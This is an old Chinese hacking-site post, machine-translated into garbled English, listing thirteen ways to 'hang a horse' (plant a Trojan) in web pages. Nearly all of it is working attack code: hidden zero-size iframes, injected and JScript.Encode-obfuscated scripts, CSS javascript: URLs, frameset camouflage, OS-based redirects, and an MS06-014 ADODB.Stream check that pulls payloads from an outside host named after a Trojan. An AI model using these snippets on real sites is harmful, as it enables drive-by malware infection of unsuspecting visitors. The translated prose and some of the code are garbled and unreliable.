Hung it to the way and the system determines whether the code-vulnerability warning-the black bar safety net

ID MYHACK58:62200715442
Type myhack58
Reporter 佚名
Modified 2007-05-14T00:00:00


A:The frame hanging horse <iframe src=address width=0 height=0></iframe>

II:the js file hanging horse First, the following code document. write("<iframe width='0' height='0' src='address'></iframe>"); 保存 为 xxx.js that The JS hung it to the code <script language=javascript src=xxx. js></script>

Three:js modification encryption <SCRIPT language="JScript. Encode" src=http://www. upx. com. cn/muma. txt></script> muma. txt can be changed to any suffix

Four:the body hanging horse <body ></body>

Five:concealed hanging horse top. document. body. innerHTML = top. document. body. innerHTML + '\r\n<iframe src=""></iframe>';

Six:css hang horse body { background-image: url('javascript:document. write("<script src=http://www. upx. com. cn/muma. js></script>")')}

Seven:JAJA hung it to the <SCRIPT language=javascript> window. open ("address","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script>

Eight:picture camouflage <html> <iframe src="horse address" height=0 width=0></iframe> <img src="image address"></center> </html>

Nine:camouflage call: <frameset rows="444,0" cols="*"> <frame src="open web page" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> <frame src="horse address" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> </frameset>

Ten:advanced cheating <a href=" confuse the connection address, display this address points to the Trojan address)" > page content to be displayed </a> <SCRIPT Language="JavaScript"> function www_163_com () { var url="mA address"; open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=8 0 0,height=6 0 0,left=1 0,top=1 0"); } </SCRIPT>

Eleven:determine the system code

<! DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>4 0 4</TITLE> <META http-equiv=Content-Type content="text/html; charset=windows-1 2 5 2"> <META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD> <BODY> <SCRIPT language=javascript> window. status=""; if(navigator. userAgent. indexOf("Windows NT 5.1") != -1) window. location. href="tk.htm"; else window. location. href="upx06014.htm"; </SCRIPT> </BODY></HTML>

Twelve:to determine whether there is ms06014 code

<script language=VBScript> on error resume next set server = document. createElement("object") server. setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E" set File = server. createobject(Adodb. Stream,"") if Not Err. Number = 0 then err. clear document. write ("<iframe src=http://upx. com. cn width=1 0 0% height=1 0 0% scrolling=no frameborder=0>") else document. write ("<iframe src=http://upx. com. cn width=1 0 0% height=1 0 0% scrolling=no frameborder=0>") end if </script>

XIII:the intelligent reading js code demo

//Read marry the src of the object var v = document. getElementById("advjs"); //Read marry the src parameter var u_num = getUrlParameterAdv("showmatrix_num",v. getAttribute('src'));

document. write("<iframe src=\""+u_num+". htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>"); document. writeln("<! DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">"); document. writeln("<HTML><HEAD>"); document. writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">"); document. writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>"); document. writeln("<BODY> "); document. writeln("<DIV style=\"CURSOR: url(\'http:\/\/\/demo.js\')\">"); document. writeln("<DIV "); document. writeln("style=\"CURSOR: url(\'http:\/\/\/demo.js\')\"><\/DIV><\/DIV><\/BODY><\/HTML>")

//Analyse src function parameters function getUrlParameterAdv(asName,lsURL){

loU = lsURL. split("?"); if (loU. length>1){

var loallPm = loU[1]. split("&");

for (var i=0; i<loallPm. length; i++){ var loPm = loallPm[i]. split("="); if (loPm[0]==asName){ if (loPm. length>1){ return loPm[1]; }else{ return ""; }} } } return null; }